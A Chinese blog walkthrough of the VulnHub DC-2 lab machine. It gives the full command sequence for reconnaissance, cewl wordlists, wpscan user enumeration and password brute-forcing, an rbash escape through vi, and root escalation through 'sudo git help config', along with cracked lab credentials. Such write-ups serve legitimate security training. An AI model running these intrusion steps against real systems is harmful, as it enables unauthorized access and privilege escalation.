vulnhub靶机DC-2

发布于:2022-11-01 ⋅ 阅读:(532) ⋅ 点赞:(0)

靶机下载地址:https://www.vulnhub.com/entry/dc-2,311/
Kaili IP:192.168.70.129
靶机ip:192.168.70.162

一、信息搜集

进行靶机ip发现和目标的端口扫描

sudo arp-scan -l
nmap -A -p 0-65535 192.168.70.162

在这里插入图片描述
在这里插入图片描述

二、域名解析

开放了80端口和用于ssh连接的7744端口
访问80端口,可以看出做了域名解析,所以需要在本地即kali的配置文件/etc/hosts文件写入,192.168.70.162 dc-2即可完成本地域名解析。
在这里插入图片描述

成功访问页面后,在页面直接看到flag1
在这里插入图片描述

三、暴力破解

告诉我们,应该使用cewl生成字典,登陆后就会看到下一个flag
cewl生成字典命令:

cewl http://dc-2 -w ycx.txt

使用dirb对网站目录进行扫描,发现有wp-admin,猜测应该是使用wordpress搭建的

dirb http://192.168.70.162

再使用wpscan对网站进行扫描,附上wpscan的使用教程
https://cloud.tencent.com/developer/article/1684063
wpscan的使用
这里使用-e u来枚举用户名

wpscan –url http://dc-2 -e u

在这里插入图片描述

将检测到的三个用户名写入yyy.txt 之后使用wpscan进行账号密码扫描,这里也可以使用burpsuit

wpscan --url http://dc-2/ --usernames /home/ycx/Desktop/yyy.txt --passwords /home/ycx/Desktop/ycx.txt

在这里插入图片描述
这里扫描出来连个账号密码

jerry adipiscing
tom parturient

这里使用jerry的密码成功登录网站
在这里插入图片描述

在pages中看到flag2
在这里插入图片描述

利用扫描到的7744端口

四、建立连接

进行ssh连接

ssh tom@192.168.70.162 -p 7744

在这里插入图片描述

登陆成功查看flag3,发现cat被拒绝使用,cd也是拒绝的,使用vi可以查看。

vi flag3.txt

在这里插入图片描述

五、rbash逃逸

发现rbash拒绝使用一些命令,关于rbash的介绍文章
https://www.freebuf.com/articles/system/188989.html

rbash简介:受限制的外壳或 rbash,顾名思义是一个类似于 bash, 但不同之处在于它有很多限制来避免用户采取某些操作。它用于安全目的 bash,但具有额外的安全层来实施这些限制

简单点就是不让你使用一些危险命令
使用:

:set shell=/bin/sh
:shell 
 或者用/bin/bash

成功绕过rbash
在vi中按下esc,输入第一条命令,回车,在输入第二条即可

切换完成之后还要添加环境变量。给$PATH变量增加两个路径,用来查找命令

export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/

在jerry的home目录下发现flag4
在这里插入图片描述

提示git
切换用户到jerry:su jerry
在这里插入图片描述

六、提权

使用git提权
直接在命令行中输入以下命令,即可提权。

sudo git help config #在末行命令模式输入 
!/bin/bash 或 !'sh' #完成提权 

在这里插入图片描述